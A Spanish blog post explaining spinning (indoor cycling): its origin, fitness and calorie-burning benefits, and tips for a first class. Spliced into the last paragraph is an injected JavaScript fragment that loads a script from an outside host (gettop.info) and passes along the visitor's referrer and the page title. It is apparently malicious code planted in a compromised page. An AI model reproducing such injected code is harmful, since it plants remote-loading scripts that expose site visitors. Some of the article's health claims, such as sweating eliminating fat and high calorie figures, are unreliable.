Salud y belleza » Deportes

¿Qué es el Spinning?

Sin Comentarios

Básicamente, el famoso y tan nombrado “spinning” (algunos lo llaman “indoor cycling”) es un entrenamiento o ejercicio aeróbico que se efectúa con una bicicleta estática al ritmo de determinada música o melodía. Se trata de una práctica creada allá por el año 1992 gracias al talento del norteamericano Jonathan Goldber, quién buscaba un ejercicio integral y grupal.

El Spinning ofrece muchas ventajas para el cuerpo; fortalece el sistema cardiovascular y el sistema respiratorio, quema colesterol y alrededor de 800 calorías, en aproximadamente 45 minutos de ejercicio. Además fortalece los miembros inferiores dándoles mayor fuerza.

Lleva el montar a bicicleta a otro nivel, ya que no es el ejercicio solitario y se puede ajustar según las capacidades de quienes lo practican.

Normalmente, el spinning es dirigido por un entrenador, quien va indicando los movimientos y la velocidad. El último campeón del mundo de ésta especialidad es un Argentino nacionalizado Español.

Antes de apuntarnos en cualquier clase de Spinning debemos tener en cuenta:

1) pedirle al instructor que nos indique cómo fijar la bicicleta a la altura óptima para el pedaleo y como subir o aminorar la resistencia

2) beber agua y mantenerse hidratado, durante toda  la sesión para no provocar cualquier incidente relacionado con la pérdida de líquido.

El famoso Spinning permite una preparación física sumamente completa. ¿Por qué? Sencillo: al praticarlo se efectúa no solo ejercicio cardiovascular sino también, a la vez, se consigue tonificar los músculos tanto de piernas como de brazos. Por otra parte, la práctica de éste trabajo quiebra la monotonía de la bicicleta estática y la convierte en un deporte divertido, relajado,  motivante y más.

Como si esto fuera poco, el desgaste calórico que se produce al realizar Spinning es sumamente elevado en comparación a otros deportes: entre 500 y 1000 calorías por sesión dependiendo de la forma física pueden llegar a quemarse.

¿Hay más? Por supuesto: al hacer Spinning se consigue excluir líquido a través del sudor favoreciendo, por supuesto, la eliminación de grasas. A su vez, dicha labor tonifica piernas y sobretodo glúteos (ideal para mujeres),

El Spinning no es una prática elitista, para nada: lo pueden practicar personas de todas las edades y no se requiere una forma física especial puesto que se puede adaptar a diferentes niveles de resistencia física. Solo basta un poco de ganas, fuerza de voluntad y determinación para hacer Spinning. Apuntate a una clase en tu gimnasio y verás de que se trata.}s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.